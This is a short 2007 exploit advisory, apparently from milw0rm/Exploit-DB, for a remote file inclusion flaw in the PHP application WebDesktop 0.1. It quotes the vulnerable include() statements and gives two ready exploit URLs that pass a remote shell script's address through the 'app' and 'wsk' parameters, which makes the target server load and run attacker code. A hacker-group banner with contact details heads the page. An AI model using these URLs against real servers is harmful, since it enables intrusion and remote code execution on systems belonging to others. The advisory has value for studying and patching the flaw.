WebDesktop 0.1 - Remote File Inclusion

EDB-ID:

4518

Author:

S.W.A.T.

Type:

webapps

Platform:

PHP

Published:

2007-10-11

                      \\\|///
                    \\  - -  //      Xmors Underground Group
                     (  @ @ )
              ----oOOo--(_)-oOOo--------------------------------------------------
              Portal   :  WebDesktop 0.1
              Download :  http://downloads.sourceforge.net/pns-webdesktop/webDesktop-0.1-linux.tar.gz
	      Author   :  S.W.A.T.
	      HomePage :  wWw.XmorS.CoM
	      Type     :  Remote File Inclusion
              Y! ID    :  Svvateam
              E-Mail   :  Svvateam@yahoo.com / S.W.4.T@hackermail.com
              Dork     :   :( 
              ----ooooO-----Ooooo--------------------------------------------------
                  (   )     (   )
                   \ (       ) /
                    \_)     (_/



+---------------------------------------------------------------------------------------------+

Vuln Code :

include($wsk . ".wsk/" . $wsk . ".php");

&&&&&&&&

include($app . ".app/" . $frm . ".frm/" . $frm . ".php");

+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+

Exploit :

http://[TARGET]/[PATH]/apps/apps.php?app=[-Sh3ll-]
http://[TARGET]/[PATH]/wsk/wsk.php?wsk=[-Sh3ll-]


+---------------------------------------------------------------------------------------------+

# milw0rm.com [2007-10-11]